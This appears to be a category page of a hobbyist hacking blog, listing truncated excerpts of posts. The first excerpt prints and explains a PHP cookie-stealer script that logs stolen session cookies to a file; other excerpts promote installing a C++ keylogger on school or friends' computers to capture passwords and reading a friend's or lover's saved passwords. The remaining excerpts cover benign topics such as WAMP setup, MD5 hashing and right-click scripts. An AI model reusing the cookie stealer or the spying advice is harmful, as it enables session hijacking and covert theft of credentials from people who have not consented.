Here is the simple Cookie Stealer code:Cookie stored in File: <?php$cookie = $HTTP_GET_VARS[“cookie”];$steal = fopen(“cookiefile.txt”, “a”);fwrite($steal, $cookie .”\n”);fclose($steal);?> $cookie = $HTTP_GET_VARS[“cookie”]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable. $steal = fopen(“cookiefile.txt”, “a”); This open the cookiefile in append mode so that we can append the stolen cookie. fwrite($steal, $cookie […]
Category: Programming
Ethical Hackers Forum Launched- Join us
Update:The forum is deleted becoz we are not able to maintain it. —Hi BTS readers, We are proud to say our Ethical Hackers, programmers Forum is launched now. Join with us now. Our forum’s page rank is 2. Our forum is mainly concerned with two parts: Programming(My Favorite part) Hacking and Security(Our Favorite Part) Programming: […]
How to run php files using wamp server?
Let me explain today how to use the wamp server to run the PHP files. First of all download the Latest wamp server from here: http://www.wampserver.com/ and install the server. Step 2:Run wamp server by this selctionstart->All programs->Wamp server->Start wamp server Now you can see the w icon in system tray. Step 3: Create PHP […]
Learn To create Keylogger using C++|Basic Hacking Tutorials
Hi friends, the most interesting part of the hacking is spying. Today i am going to introduce to the C++ Spyware code. It is going to be very fun. You can install this spyware in your college/school or in your friend system, and get their username and passwords. This is very simple hacking trick […]
Hacking Autorun.inf virus attack|Is autorun.inf virus?
When i studied second year(cse), my friends told that autorun.inf is virus. I thought so. Because my antivirus blocks autorun.inf files. In third year when i search about autorun.inf file in net, i realize about the auto run file. Today i bring some files from my college system. When i insert the pen drive […]
How to see the remembered passwords | passwords autofill Cracked
I am going to teach you how to see the passwords which are shown as astersik characters(*). What is the use? if your friend/lover select the remember passwords option when login,then you got the chance to hack their password without much effort(no need of phishing ). Two cases: Case I: if they select remember password in […]
MD5 Hash Code for PHP Developers
Hi friends, This post is especially for PHP Developers. I hope you know about MD5. If you do not know,please read the following articles:Introduction to MD5 Hash CodeMD5 Hash code creation for Java Developers Like Java, php also have build in function named as “md5” for creating Hash code. how to use?Just pass the original […]
Hack to Enable Right Click in Websites
Is your favorite website disabled the right click button? No need to worry. you can enable the Right Click button after reading this article. There are different tools for disabling the javascript. But i will introduce again my favorite and best web delveloper tool for you. This is one of best tool for hackers. Download […]
How to to disable right click using javascript?
I am posting this article as per the one of my user request. It is easy to disable right click in a website using javascript. Code to disable: oncontextmenu=”alert(‘right click is disable’);return false;” now you may have doubt about placing this javascript code. This code should be in body as one of the attribute. I […]
MD5 Encryption Java Program(not Decryption)-Message Digest Algorithm
MD5 is one of the famous Hash algorithm. This algorithm is used in many websites for storing the password in encrypted form. The MD5 message-digest algorithm was developed by Ronald Rivest at MIT in 1992. This algorithm takes a input message of arbitrary length and produces a 128-bit hash value of the message. MD5 is […]